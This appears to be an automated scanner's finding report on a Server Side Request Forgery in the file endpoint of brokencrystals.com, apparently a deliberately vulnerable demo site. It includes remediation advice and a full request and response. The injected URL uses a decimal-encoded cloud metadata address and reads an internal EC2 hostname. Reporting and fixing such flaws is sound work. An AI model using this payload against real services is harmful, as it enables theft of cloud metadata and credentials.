Server Side Request Forgery
Severity: High Discovered: 10 of October-2022, 11:12 PM
CWE ID
CWE-918
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Details
A Server Side Request Forgery (also known as SSRF) attack allows an attacker to read or update internal server resources.
SSRF occurred while injecting token "http://2852039166/latest/meta-data/local-hostname" into parameter "" in the URL.
Original URL: https://brokencrystals.com/api/file?path=config/products/crystals/amethyst.jpg&type=image/jpg
Modified URL: https://brokencrystals.com/api/file?path=http%3A%2F%2F2852039166%2Flatest%2Fmeta-data%2Flocal-hostname&type=image%2Fjpg
SSRF retrieved AWS metadata from internal resource "/latest/meta-data/local-hostname".
Possible exposure
Execute Unauthorized Code or Commands; Bypass Protection Mechanism; Read Application Data
Remediation suggestions
Allowlist only the DNS names or IP addresses that the application needs to reach, and reject any user-supplied URL that resolves outside that list. Validate all user input. Never relay a raw server-side response body to the client; always parse the response first and return only the expected content. Disable any unused URL schemes, e.g. ftp://, dict://, file:///, gopher://. Require authentication on all internal services, including cloud metadata endpoints where the provider supports it.
Request
GET https://brokencrystals.com/api/file?path=http%3A%2F%2F2852039166%2Flatest%2Fmeta-data%2Flocal-hostname&type=image%2Fjpg HTTP/1.1
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Cookie: bc-calls-counter=1665443550676; connect.sid=WakDBCc1ZpjPV8GmUMZUSPjeFIchbnbk.yi%2BPDU5Oh9XifqV%2FMuNOyzT9nH8MrfnqvB%2F%2B9BIO4f0
Accept-Encoding: identity
Metadata: true
Metadata-Flavor: Google
Accept: text/html
Response
HTTP/1.1 200
Server: nginx/1.19.8
Date: Mon, 10 Oct 2022 23:12:30 GMT
Content-Type: image/jpg
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1665443550891
Content-Length: 26
Cache-Control: public, max-age=99999
ip-10-0-0-200.ec2.internal
External links